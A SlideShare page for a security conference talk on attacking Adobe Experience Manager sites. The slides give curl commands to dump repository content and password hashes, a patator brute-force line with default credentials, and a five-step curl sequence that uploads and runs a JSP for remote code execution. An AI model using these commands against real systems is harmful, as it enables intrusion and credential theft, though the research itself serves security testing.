SlideShare a Scribd company logo

Доклад Михаила Егорова на PHDays

R
ru_Parallels

The document summarizes techniques for hacking into Adobe Experience Manager sites. It provides commands to retrieve sensitive information like usernames, password hashes, and installed bundles. It also demonstrates how to achieve remote code execution on the system by uploading a script, copying it to the apps folder to load it, and then triggering it by accessing a specific URL. The document aims to reveal vulnerabilities that could provide unauthorized access or allow attackers to execute arbitrary code on the targeted system.

Internet
1 of 23
Download to read offline
Hack1ng Adobe Experience Manager sites
• Mikhail Egorov • Security researcher • Works in Odin (Parallels) • 0ang3el (at) gma1l (d0t) com Who is that guy?
• http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/ • http://www.slideshare.net/CQCON/prsentation-ben-zahler • https://docs.adobe.com/docs/en/aem/6-0/administer/security/security- checklist.html Related Work
• Sensitive information from JCR • Installed OSGI bundles • Custom scripts • Usernames • Password hashes • Elements that allow anonymous modification What do we want
• Use JsonRendererServlet Sensitive information from JCR curl -X “GET” http://127.0.0.1:8080/.json curl -X “GET” http://127.0.0.1:8080/.6.json curl -X “GET” http://127.0.0.1:8080/.tidy.6.json curl -X “GET” http://127.0.0.1:8080/.tidy.infinity.json
• List of all bundles • QueryBuilder is your friend! http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html Installed OSGI bundles curl -X “GET” http://127.0.0.1:8080/bin.tidy.infinity.json curl -X “GET” http://127.0.0.1:8080/bin/querybuilder.json
• List customs scripts • List compiled custom scripts from cache Custom scripts curl -X “GET” http://127.0.0.1:8080/apps.tidy.infinity.json curl -X “GET” http://127.0.0.1:8080/var/classes.tidy.infinity.json
• Dump content node properties • Use regular expression to extract usernames (pipe with prev command) Usernames curl -X “GET” http://127.0.0.1:8080/content.infinity.json python -c 'import sys,re; print "n".join([m.group(1) for m in re.finditer("".+?By":"(.+?)"",sys.stdin.readlines()[0])])' | sort –u
• Use QueryBuilder bundle Password hashes curl -X “GET” http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=sel ective&p.properties=rep:principalName%20rep:password&p.limit=100
• Dump content node properties • Use regular expression to check (pipe with prev command) Anonymous modification curl -X “GET” http://127.0.0.1:8080/content.infinity.json python -c 'import sys,re; m = re.search("".+?By":"anonymous"",sys.stdin.readlines()[0]); print "Anon modification: ","Yes" if m else "No"'
• Try default user credentials: admin/admin, author/author, anonymous/anonymous • Offline attack (brute hashes) • Online attack (POST servlet bundle) Getting access patator http_fuzz url=http://127.0.0.1:8080/content/fake.json method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt auth_type=basic -x ignore:code!=200 --threads 5
• XSS • CSRF • DoS • Read local files • RCE You have access, now what? Not covered, sorry!
• CVE-2015-1833 ( http://seclists.org/oss-sec/2015/q2/518 ) • Webdav OSGI bundle uses XML parser that is not properly initialized • Exploit - https://www.exploit-db.com/exploits/37110/ Webdav bundle, XXE
• Out-of-bound exploitation http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html • Pros: works with anonymous credentials • Cons: you need external server, instable • Inbound exploitation • Pros: you do not need external server, more stable • Cons: you need credentials of the user that is able to modify some node in JCR Webdav bundle, XXE
http://www.youtube.com/watch?v=Hg3AXoG89Gs Webdav bundle, XXE Demo
• We have node – http://127.0.0.1:8080/rce • We have script exec.jsp that is magically loaded into node – http://127.0.0.1:8080/apps/rcetype • When someone navigates to http://127.0.0.1:8080/rce.exec our exec.jsp will be executed. Remote code execution {"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:crea ted":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}} {"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}
• Step I: Create rcetype node Remote code execution curl –u admin:admin –Fjcr:primaryType=nt:folder http://127.0.0.1:8080/content/rcetype
• Step II: Upload script exec.jsp to rcetype node Remote code execution curl –u admin:admin –Fexec.jsp=@RCE.jsp http://127.0.0.1:8080/content/rcetype
• Step III: Copy rcetype to /apps Remote code execution curl –u admin:admin –F:operation=copy –F:dest=/apps/rcetype http://127.0.0.1:8080/content/rcetype
• Step IV: Create rce node bound to rcetype Remote code execution curl –u admin:admin –Fsling:resourceType=rcetype http://127.0.0.1:8080/content/rce
• Step V: Launch jsp script Remote code execution curl –X “GET” http://127.0.0.1:8080/content/rce.exec
http://www.youtube.com/watch?v=Z9n2T07e6Ls Remote code execution, Demo
Ask a Ninja

Recommended

Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
Xitrum HOWTOs
Xitrum HOWTOsXitrum HOWTOs
Xitrum HOWTOsNgoc Dao
 
JavaCro'14 - Securing web applications with Spring Security 3 – Fernando Redo...
JavaCro'14 - Securing web applications with Spring Security 3 – Fernando Redo...JavaCro'14 - Securing web applications with Spring Security 3 – Fernando Redo...
JavaCro'14 - Securing web applications with Spring Security 3 – Fernando Redo...
HUJAK - Hrvatska udruga Java korisnika / Croatian Java User Association
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application Firewalls
Ivan Novikov
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
Soroush Dalili
 
Middleware in Golang: InVision's Rye
Middleware in Golang: InVision's RyeMiddleware in Golang: InVision's Rye
Middleware in Golang: InVision's Rye
Cale Hoopes
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016
Aaron Hnatiw
 
淺談 Startup 公司的軟體開發流程 v2
淺談 Startup 公司的軟體開發流程 v2淺談 Startup 公司的軟體開發流程 v2
淺談 Startup 公司的軟體開發流程 v2
Wen-Tien Chang
 

Recommended

Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
Xitrum HOWTOs
Xitrum HOWTOsXitrum HOWTOs
Xitrum HOWTOsNgoc Dao
 
JavaCro'14 - Securing web applications with Spring Security 3 – Fernando Redo...
JavaCro'14 - Securing web applications with Spring Security 3 – Fernando Redo...JavaCro'14 - Securing web applications with Spring Security 3 – Fernando Redo...
JavaCro'14 - Securing web applications with Spring Security 3 – Fernando Redo...
HUJAK - Hrvatska udruga Java korisnika / Croatian Java User Association
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application Firewalls
Ivan Novikov
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
Soroush Dalili
 
Middleware in Golang: InVision's Rye
Middleware in Golang: InVision's RyeMiddleware in Golang: InVision's Rye
Middleware in Golang: InVision's Rye
Cale Hoopes
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016
Aaron Hnatiw
 
淺談 Startup 公司的軟體開發流程 v2
淺談 Startup 公司的軟體開發流程 v2淺談 Startup 公司的軟體開發流程 v2
淺談 Startup 公司的軟體開發流程 v2
Wen-Tien Chang
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
Node.js Dublin Meetup April 2014
Node.js Dublin Meetup April 2014Node.js Dublin Meetup April 2014
Node.js Dublin Meetup April 2014Damian Beresford
 
Scaling and Managing Selenium Grid
Scaling and Managing Selenium GridScaling and Managing Selenium Grid
Scaling and Managing Selenium Grid
dimakovalenko
 
Visual Studio 2013, Xamarin and Microsoft Azure Mobile Services: A Match Made...
Visual Studio 2013, Xamarin and Microsoft Azure Mobile Services: A Match Made...Visual Studio 2013, Xamarin and Microsoft Azure Mobile Services: A Match Made...
Visual Studio 2013, Xamarin and Microsoft Azure Mobile Services: A Match Made...
Rick G. Garibay
 
Selenium webdriver
Selenium webdriverSelenium webdriver
Selenium webdriver
sean_todd
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknessesIvan Novikov
 
Selenium testing
Selenium testingSelenium testing
Selenium testing
Jason Myers
 
In-browser storage and me
In-browser storage and meIn-browser storage and me
In-browser storage and me
Jason Casden
 
Workshop: Creating RESTful API’s with Grails and Spring Security (GR8Conf 2014)
Workshop: Creating RESTful API’s with Grails and Spring Security (GR8Conf 2014)Workshop: Creating RESTful API’s with Grails and Spring Security (GR8Conf 2014)
Workshop: Creating RESTful API’s with Grails and Spring Security (GR8Conf 2014)
Alvaro Sanchez-Mariscal
 
TDD a REST API With Node.js and MongoDB
TDD a REST API With Node.js and MongoDBTDD a REST API With Node.js and MongoDB
TDD a REST API With Node.js and MongoDB
Valeri Karpov
 
Web driver training
Web driver trainingWeb driver training
Web driver training
Dipesh Bhatewara
 
Drupal, Android and iPhone
Drupal, Android and iPhoneDrupal, Android and iPhone
Drupal, Android and iPhone
Alexandru Badiu
 
Алексей Швайка "Bundling: you are doing it wrong"
Алексей Швайка "Bundling: you are doing it wrong"Алексей Швайка "Bundling: you are doing it wrong"
Алексей Швайка "Bundling: you are doing it wrong"
Fwdays
 
Selenide
SelenideSelenide
Selenide
DataArt
 
Node.js Anti-Patterns and bad practices
Node.js Anti-Patterns and bad practicesNode.js Anti-Patterns and bad practices
Node.js Anti-Patterns and bad practices
Igor Soarez
 
Building APIs with NodeJS on Microsoft Azure Websites - Redmond
Building APIs with NodeJS on Microsoft Azure Websites - RedmondBuilding APIs with NodeJS on Microsoft Azure Websites - Redmond
Building APIs with NodeJS on Microsoft Azure Websites - Redmond
Rick G. Garibay
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to rails
snyff
 
Selenide
SelenideSelenide
Selenide
GlobalLogic Ukraine
 
JavaScript Performance Patterns
JavaScript Performance PatternsJavaScript Performance Patterns
JavaScript Performance Patterns
Stoyan Stefanov
 
Ruxmon cve 2012-2661
Ruxmon cve 2012-2661Ruxmon cve 2012-2661
Ruxmon cve 2012-2661
snyff
 
Доклад Якова Зубарева на конференции MBLT15
Доклад Якова Зубарева на конференции MBLT15Доклад Якова Зубарева на конференции MBLT15
Доклад Якова Зубарева на конференции MBLT15
ru_Parallels
 
Vagrant Plugin development
Vagrant Plugin developmentVagrant Plugin development
Vagrant Plugin development
ru_Parallels
 

More Related Content

What's hot

Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
Node.js Dublin Meetup April 2014
Node.js Dublin Meetup April 2014Node.js Dublin Meetup April 2014
Node.js Dublin Meetup April 2014Damian Beresford
 
Scaling and Managing Selenium Grid
Scaling and Managing Selenium GridScaling and Managing Selenium Grid
Scaling and Managing Selenium Grid
dimakovalenko
 
Visual Studio 2013, Xamarin and Microsoft Azure Mobile Services: A Match Made...
Visual Studio 2013, Xamarin and Microsoft Azure Mobile Services: A Match Made...Visual Studio 2013, Xamarin and Microsoft Azure Mobile Services: A Match Made...
Visual Studio 2013, Xamarin and Microsoft Azure Mobile Services: A Match Made...
Rick G. Garibay
 
Selenium webdriver
Selenium webdriverSelenium webdriver
Selenium webdriver
sean_todd
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknessesIvan Novikov
 
Selenium testing
Selenium testingSelenium testing
Selenium testing
Jason Myers
 
In-browser storage and me
In-browser storage and meIn-browser storage and me
In-browser storage and me
Jason Casden
 
Workshop: Creating RESTful API’s with Grails and Spring Security (GR8Conf 2014)
Workshop: Creating RESTful API’s with Grails and Spring Security (GR8Conf 2014)Workshop: Creating RESTful API’s with Grails and Spring Security (GR8Conf 2014)
Workshop: Creating RESTful API’s with Grails and Spring Security (GR8Conf 2014)
Alvaro Sanchez-Mariscal
 
TDD a REST API With Node.js and MongoDB
TDD a REST API With Node.js and MongoDBTDD a REST API With Node.js and MongoDB
TDD a REST API With Node.js and MongoDB
Valeri Karpov
 
Web driver training
Web driver trainingWeb driver training
Web driver training
Dipesh Bhatewara
 
Drupal, Android and iPhone
Drupal, Android and iPhoneDrupal, Android and iPhone
Drupal, Android and iPhone
Alexandru Badiu
 
Алексей Швайка "Bundling: you are doing it wrong"
Алексей Швайка "Bundling: you are doing it wrong"Алексей Швайка "Bundling: you are doing it wrong"
Алексей Швайка "Bundling: you are doing it wrong"
Fwdays
 
Selenide
SelenideSelenide
Selenide
DataArt
 
Node.js Anti-Patterns and bad practices
Node.js Anti-Patterns and bad practicesNode.js Anti-Patterns and bad practices
Node.js Anti-Patterns and bad practices
Igor Soarez
 
Building APIs with NodeJS on Microsoft Azure Websites - Redmond
Building APIs with NodeJS on Microsoft Azure Websites - RedmondBuilding APIs with NodeJS on Microsoft Azure Websites - Redmond
Building APIs with NodeJS on Microsoft Azure Websites - Redmond
Rick G. Garibay
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to rails
snyff
 
Selenide
SelenideSelenide
Selenide
GlobalLogic Ukraine
 
JavaScript Performance Patterns
JavaScript Performance PatternsJavaScript Performance Patterns
JavaScript Performance Patterns
Stoyan Stefanov
 
Ruxmon cve 2012-2661
Ruxmon cve 2012-2661Ruxmon cve 2012-2661
Ruxmon cve 2012-2661
snyff
 

What's hot (20)

Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 
Node.js Dublin Meetup April 2014
Node.js Dublin Meetup April 2014Node.js Dublin Meetup April 2014
Node.js Dublin Meetup April 2014
 
Scaling and Managing Selenium Grid
Scaling and Managing Selenium GridScaling and Managing Selenium Grid
Scaling and Managing Selenium Grid
 
Visual Studio 2013, Xamarin and Microsoft Azure Mobile Services: A Match Made...
Visual Studio 2013, Xamarin and Microsoft Azure Mobile Services: A Match Made...Visual Studio 2013, Xamarin and Microsoft Azure Mobile Services: A Match Made...
Visual Studio 2013, Xamarin and Microsoft Azure Mobile Services: A Match Made...
 
Selenium webdriver
Selenium webdriverSelenium webdriver
Selenium webdriver
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknesses
 
Selenium testing
Selenium testingSelenium testing
Selenium testing
 
In-browser storage and me
In-browser storage and meIn-browser storage and me
In-browser storage and me
 
Workshop: Creating RESTful API’s with Grails and Spring Security (GR8Conf 2014)
Workshop: Creating RESTful API’s with Grails and Spring Security (GR8Conf 2014)Workshop: Creating RESTful API’s with Grails and Spring Security (GR8Conf 2014)
Workshop: Creating RESTful API’s with Grails and Spring Security (GR8Conf 2014)
 
TDD a REST API With Node.js and MongoDB
TDD a REST API With Node.js and MongoDBTDD a REST API With Node.js and MongoDB
TDD a REST API With Node.js and MongoDB
 
Web driver training
Web driver trainingWeb driver training
Web driver training
 
Drupal, Android and iPhone
Drupal, Android and iPhoneDrupal, Android and iPhone
Drupal, Android and iPhone
 
Алексей Швайка "Bundling: you are doing it wrong"
Алексей Швайка "Bundling: you are doing it wrong"Алексей Швайка "Bundling: you are doing it wrong"
Алексей Швайка "Bundling: you are doing it wrong"
 
Selenide
SelenideSelenide
Selenide
 
Node.js Anti-Patterns and bad practices
Node.js Anti-Patterns and bad practicesNode.js Anti-Patterns and bad practices
Node.js Anti-Patterns and bad practices
 
Building APIs with NodeJS on Microsoft Azure Websites - Redmond
Building APIs with NodeJS on Microsoft Azure Websites - RedmondBuilding APIs with NodeJS on Microsoft Azure Websites - Redmond
Building APIs with NodeJS on Microsoft Azure Websites - Redmond
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to rails
 
Selenide
SelenideSelenide
Selenide
 
JavaScript Performance Patterns
JavaScript Performance PatternsJavaScript Performance Patterns
JavaScript Performance Patterns
 
Ruxmon cve 2012-2661
Ruxmon cve 2012-2661Ruxmon cve 2012-2661
Ruxmon cve 2012-2661
 

Viewers also liked

Доклад Якова Зубарева на конференции MBLT15
Доклад Якова Зубарева на конференции MBLT15Доклад Якова Зубарева на конференции MBLT15
Доклад Якова Зубарева на конференции MBLT15
ru_Parallels
 
Vagrant Plugin development
Vagrant Plugin developmentVagrant Plugin development
Vagrant Plugin development
ru_Parallels
 
Тестирование ПО, основанного на сторонних компонентах, на примере дистрибут...
Тестирование ПО, основанного на сторонних компонентах, на примере дистрибут...Тестирование ПО, основанного на сторонних компонентах, на примере дистрибут...
Тестирование ПО, основанного на сторонних компонентах, на примере дистрибут...
ru_Parallels
 
Виртуализация инфраструктуры ЦОД российской разработки
Виртуализация инфраструктуры ЦОД российской разработкиВиртуализация инфраструктуры ЦОД российской разработки
Виртуализация инфраструктуры ЦОД российской разработки
ru_Parallels
 
Передача состояния с iPhone на Apple Watch
Передача состояния с iPhone на Apple WatchПередача состояния с iPhone на Apple Watch
Передача состояния с iPhone на Apple Watch
ru_Parallels
 
Инновационные решения для роста облачного бизнеса
Инновационные решения для роста облачного бизнесаИнновационные решения для роста облачного бизнеса
Инновационные решения для роста облачного бизнесаru_Parallels
 
Pavel Ershov on WHD.Moscow
Pavel Ershov on WHD.MoscowPavel Ershov on WHD.Moscow
Pavel Ershov on WHD.Moscowru_Parallels
 
Virtuozzo platform
Virtuozzo platformVirtuozzo platform
Virtuozzo platform
ru_Parallels
 
OpenStack лучше с Virtuozzo
OpenStack лучше с VirtuozzoOpenStack лучше с Virtuozzo
OpenStack лучше с Virtuozzo
ru_Parallels
 
Цифровой суверенитет для российских облачных систем
Цифровой суверенитет для российских облачных системЦифровой суверенитет для российских облачных систем
Цифровой суверенитет для российских облачных систем
ru_Parallels
 
KAnisimov riw2011-hosting-future
KAnisimov riw2011-hosting-futureKAnisimov riw2011-hosting-future
KAnisimov riw2011-hosting-future
ru_Parallels
 
2013 WHD.local Istanbul Presentation
2013 WHD.local Istanbul Presentation2013 WHD.local Istanbul Presentation
2013 WHD.local Istanbul Presentationru_Parallels
 
Сверхоптимизация кода на Python
Сверхоптимизация кода на PythonСверхоптимизация кода на Python
Сверхоптимизация кода на Python
ru_Parallels
 
Что должен уметь Linux программист
Что должен уметь Linux программистЧто должен уметь Linux программист
Что должен уметь Linux программист
ru_Parallels
 
Надежность ПО и Runtime Verification
Надежность ПО и Runtime VerificationНадежность ПО и Runtime Verification
Надежность ПО и Runtime Verification
ru_Parallels
 
Resource management in the cloud
Resource management in the cloudResource management in the cloud
Resource management in the cloud
ru_Parallels
 
Kolerov parallels cloud_market_in_numbers
Kolerov parallels cloud_market_in_numbersKolerov parallels cloud_market_in_numbers
Kolerov parallels cloud_market_in_numbersru_Parallels
 
Управление рисками в разработке программного обеспечения
Управление рисками в разработке программного обеспеченияУправление рисками в разработке программного обеспечения
Управление рисками в разработке программного обеспечения
ru_Parallels
 
Activity break presentation
Activity break presentation Activity break presentation
Activity break presentation meriwetherpe
 

Viewers also liked (19)

Доклад Якова Зубарева на конференции MBLT15
Доклад Якова Зубарева на конференции MBLT15Доклад Якова Зубарева на конференции MBLT15
Доклад Якова Зубарева на конференции MBLT15
 
Vagrant Plugin development
Vagrant Plugin developmentVagrant Plugin development
Vagrant Plugin development
 
Тестирование ПО, основанного на сторонних компонентах, на примере дистрибут...
Тестирование ПО, основанного на сторонних компонентах, на примере дистрибут...Тестирование ПО, основанного на сторонних компонентах, на примере дистрибут...
Тестирование ПО, основанного на сторонних компонентах, на примере дистрибут...
 
Виртуализация инфраструктуры ЦОД российской разработки
Виртуализация инфраструктуры ЦОД российской разработкиВиртуализация инфраструктуры ЦОД российской разработки
Виртуализация инфраструктуры ЦОД российской разработки
 
Передача состояния с iPhone на Apple Watch
Передача состояния с iPhone на Apple WatchПередача состояния с iPhone на Apple Watch
Передача состояния с iPhone на Apple Watch
 
Инновационные решения для роста облачного бизнеса
Инновационные решения для роста облачного бизнесаИнновационные решения для роста облачного бизнеса
Инновационные решения для роста облачного бизнеса
 
Pavel Ershov on WHD.Moscow
Pavel Ershov on WHD.MoscowPavel Ershov on WHD.Moscow
Pavel Ershov on WHD.Moscow
 
Virtuozzo platform
Virtuozzo platformVirtuozzo platform
Virtuozzo platform
 
OpenStack лучше с Virtuozzo
OpenStack лучше с VirtuozzoOpenStack лучше с Virtuozzo
OpenStack лучше с Virtuozzo
 
Цифровой суверенитет для российских облачных систем
Цифровой суверенитет для российских облачных системЦифровой суверенитет для российских облачных систем
Цифровой суверенитет для российских облачных систем
 
KAnisimov riw2011-hosting-future
KAnisimov riw2011-hosting-futureKAnisimov riw2011-hosting-future
KAnisimov riw2011-hosting-future
 
2013 WHD.local Istanbul Presentation
2013 WHD.local Istanbul Presentation2013 WHD.local Istanbul Presentation
2013 WHD.local Istanbul Presentation
 
Сверхоптимизация кода на Python
Сверхоптимизация кода на PythonСверхоптимизация кода на Python
Сверхоптимизация кода на Python
 
Что должен уметь Linux программист
Что должен уметь Linux программистЧто должен уметь Linux программист
Что должен уметь Linux программист
 
Надежность ПО и Runtime Verification
Надежность ПО и Runtime VerificationНадежность ПО и Runtime Verification
Надежность ПО и Runtime Verification
 
Resource management in the cloud
Resource management in the cloudResource management in the cloud
Resource management in the cloud
 
Kolerov parallels cloud_market_in_numbers
Kolerov parallels cloud_market_in_numbersKolerov parallels cloud_market_in_numbers
Kolerov parallels cloud_market_in_numbers
 
Управление рисками в разработке программного обеспечения
Управление рисками в разработке программного обеспеченияУправление рисками в разработке программного обеспечения
Управление рисками в разработке программного обеспечения
 
Activity break presentation
Activity break presentation Activity break presentation
Activity break presentation
 

Similar to Доклад Михаила Егорова на PHDays

[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
Hackito Ergo Sum
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best Practices
Volkan Özçelik
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Volkan Özçelik
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
Volkan Özçelik
 
How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?
Ksenia Peguero
 
introduction to node.js
introduction to node.jsintroduction to node.js
introduction to node.js
orkaplan
 
End-to-end HTML5 APIs - The Geek Gathering 2013
End-to-end HTML5 APIs - The Geek Gathering 2013End-to-end HTML5 APIs - The Geek Gathering 2013
End-to-end HTML5 APIs - The Geek Gathering 2013
Alexandre Morgaut
 
Oracle WebLogic Diagnostics & Perfomance tuning
Oracle WebLogic Diagnostics & Perfomance tuningOracle WebLogic Diagnostics & Perfomance tuning
Oracle WebLogic Diagnostics & Perfomance tuning
Michel Schildmeijer
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaoladrewz lin
 
Android lessons you won't learn in school
Android lessons you won't learn in schoolAndroid lessons you won't learn in school
Android lessons you won't learn in school
Michael Galpin
 
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript Applications
Lewis Ardern
 
Rack
RackRack
Rack
shaokun
 
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
Felipe Prado
 
Node azure
Node azureNode azure
Node azure
Emanuele DelBono
 
OWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersOWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA Testers
Javan Rasokat
 
End-to-end W3C APIs - tpac 2012
End-to-end W3C APIs - tpac 2012End-to-end W3C APIs - tpac 2012
End-to-end W3C APIs - tpac 2012
Alexandre Morgaut
 
Web a Quebec - JS Debugging
Web a Quebec - JS DebuggingWeb a Quebec - JS Debugging
Web a Quebec - JS Debugging
Rami Sayar
 
Play Framework and Activator
Play Framework and ActivatorPlay Framework and Activator
Play Framework and Activator
Kevin Webber
 
Play 2 Java Framework with TDD
Play 2 Java Framework with TDDPlay 2 Java Framework with TDD
Play 2 Java Framework with TDD
Basav Nagur
 
Play2 Java
Play2 JavaPlay2 Java
Play2 Java
XP Conference India
 

Similar to Доклад Михаила Егорова на PHDays (20)

[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best Practices
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
 
How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?
 
introduction to node.js
introduction to node.jsintroduction to node.js
introduction to node.js
 
End-to-end HTML5 APIs - The Geek Gathering 2013
End-to-end HTML5 APIs - The Geek Gathering 2013End-to-end HTML5 APIs - The Geek Gathering 2013
End-to-end HTML5 APIs - The Geek Gathering 2013
 
Oracle WebLogic Diagnostics & Perfomance tuning
Oracle WebLogic Diagnostics & Perfomance tuningOracle WebLogic Diagnostics & Perfomance tuning
Oracle WebLogic Diagnostics & Perfomance tuning
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaola
 
Android lessons you won't learn in school
Android lessons you won't learn in schoolAndroid lessons you won't learn in school
Android lessons you won't learn in school
 
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript Applications
 
Rack
RackRack
Rack
 
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
 
Node azure
Node azureNode azure
Node azure
 
OWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersOWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA Testers
 
End-to-end W3C APIs - tpac 2012
End-to-end W3C APIs - tpac 2012End-to-end W3C APIs - tpac 2012
End-to-end W3C APIs - tpac 2012
 
Web a Quebec - JS Debugging
Web a Quebec - JS DebuggingWeb a Quebec - JS Debugging
Web a Quebec - JS Debugging
 
Play Framework and Activator
Play Framework and ActivatorPlay Framework and Activator
Play Framework and Activator
 
Play 2 Java Framework with TDD
Play 2 Java Framework with TDDPlay 2 Java Framework with TDD
Play 2 Java Framework with TDD
 
Play2 Java
Play2 JavaPlay2 Java
Play2 Java
 

Recently uploaded

一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
keoku
 
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
ufdana
 
How to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptxHow to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptx
Gal Baras
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
eutxy
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
